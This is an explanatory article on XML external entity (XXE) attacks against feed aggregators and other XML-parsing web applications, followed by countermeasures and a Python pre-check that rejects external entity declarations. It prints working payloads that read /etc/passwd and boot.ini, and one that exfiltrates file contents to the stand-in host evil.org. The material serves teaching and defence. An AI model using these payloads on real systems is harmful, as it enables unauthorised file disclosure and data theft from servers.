Like directory traversal attacks, XML external entity attacks allow the attacker to read arbitrary files on the server from SSL private keys to password files.
A little-known “feature” of XML is external entities, whereby developers can define their own XML entities. For example, this sample XML-based Really Simple Syndication (RSS) document defines the &author; entity and uses it throughout the page:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY author "Fluffy Bunny">
]>
<tag>&author;</tag>
You can also define entities that read system files. For example, when an XML parser reads the following RSS document, the parser will replace &passwd; or &passwd2; with the contents of /etc/passwd:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY passwd SYSTEM "file:/etc/passwd">
<!ENTITY passwd2 SYSTEM "file:///etc/passwd">
]>
<rss version="2.0">
<channel>
<title>My attack RSS feed showing /etc/passwd</title>
<description>this is file:/etc/passwd: &passwd; and this is
file:///etc/passwd: &passwd2;</description>
<item>
<title>/etc/passwd</title>
<description>file:/etc/passwd: &passwd; file:///etc/passwd:
&passwd2;</description>
<link>http://example.com</link>
</item>
</channel>
</rss>
To exploit this attack, the attacker simply places this RSS file on his or her web site and adds this attack RSS feed to some online RSS aggregator. If the RSS aggregator is vulnerable, the attacker will see the contents of /etc/passwd on the vulnerable aggregator while viewing the attack RSS feed.
The XML file can even send the files back to the attacker, so simply uploading an XML file is enough. This is great for attacking backend systems where the attacker will never see the output of the XML file. Create one entity to load up a sensitive file on the server (say c:\boot.ini) and create another entity loading a URL to the attacker’s site with the former entity within the request, like so:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE doc [
<!ENTITY bootini SYSTEM "file:///C:/boot.ini">
<!ENTITY sendbootini SYSTEM "http://evil.org/getBootIni?&bootini;">
]>
&sendbootini;
Obviously, this attack can lead to arbitrary file disclosure on the vulnerable web server. It is not limited to RSS feeds. This attack can be mounted on all web applications that accept XML documents and parse the document.
It’s amazing how many web applications integrate RSS feeds as an add-on feature. These applications tend to add this feature as an afterthought and are vulnerable to this attack.
Countermeasure: Preventing XXE Attacks
To protect against XXE attacks, simply instruct the XML parser you use to prohibit external entities. How you prohibit external entities varies depending on the XML parser used. For example, JAXP and Xerces do not resolve entities by default, while in LibXML developers must explicitly turn off entity expansion with expand_entities(0).
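As an added example (not from the original post, and not the parser-specific switch named above), the following Python code enforces the same policy with only the standard library: it walks the DTD with expat before the application parser sees the document and rejects any entity that carries a SYSTEM or PUBLIC identifier, while still allowing harmless internal entities such as the &author; example. The two sample feeds are constructed for this example.

```python
"""Reject XML documents that declare external entities before parsing them.

Added example; relies only on the Python standard library (xml.parsers.expat
and xml.etree). The sample feeds at the bottom are constructed inputs.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class ExternalEntityRejected(ValueError):
    """Raised when a document declares an external or parameter entity."""


def reject_external_entities(xml_bytes: bytes) -> None:
    """First pass: scan the DTD with expat and raise on anything that could
    make a parser touch the file system or the network."""
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities (plain text substitutions) are harmless; anything
        # with a SYSTEM/PUBLIC identifier, or any parameter entity, is refused.
        if is_parameter or system_id is not None or public_id is not None:
            raise ExternalEntityRejected(
                f"external entity declared: {name!r} -> {(system_id or public_id)!r}"
            )

    def on_external_ref(context, base, system_id, public_id):
        # Belt and braces: never resolve an external reference, even if one
        # somehow reached the content without a matching declaration callback.
        raise ExternalEntityRejected(f"external entity reference refused: {system_id!r}")

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    # Exceptions raised inside expat callbacks propagate out of Parse().
    parser.Parse(xml_bytes, True)


def safe_parse(xml_bytes: bytes) -> ET.Element:
    """Parse only after the document has passed the external-entity check."""
    reject_external_entities(xml_bytes)
    return ET.fromstring(xml_bytes)


def check(xml_bytes: bytes) -> str:
    """Return a one-line verdict, handy for logging at the ingestion point."""
    try:
        root = safe_parse(xml_bytes)
        return "accepted: " + "".join(root.itertext())
    except ExternalEntityRejected as exc:
        return "rejected: " + str(exc)


# Constructed sample: internal entity only, should be accepted.
BENIGN_FEED = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY author "Fluffy Bunny"> ]>
<tag>&author;</tag>"""

# Constructed sample: external entity pointing at a local file, should be rejected.
ATTACK_FEED = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<rss version="2.0"><channel><title>feed</title>
<description>&passwd;</description></channel></rss>"""


if __name__ == "__main__":
    print(check(BENIGN_FEED))
    print(check(ATTACK_FEED))
```

Run the pre-check on every XML document accepted from outside (RSS feeds, uploads, API bodies) before handing it to whichever parser the application actually uses; rejecting at the declaration rather than at the reference means the verdict does not depend on that parser's own entity defaults.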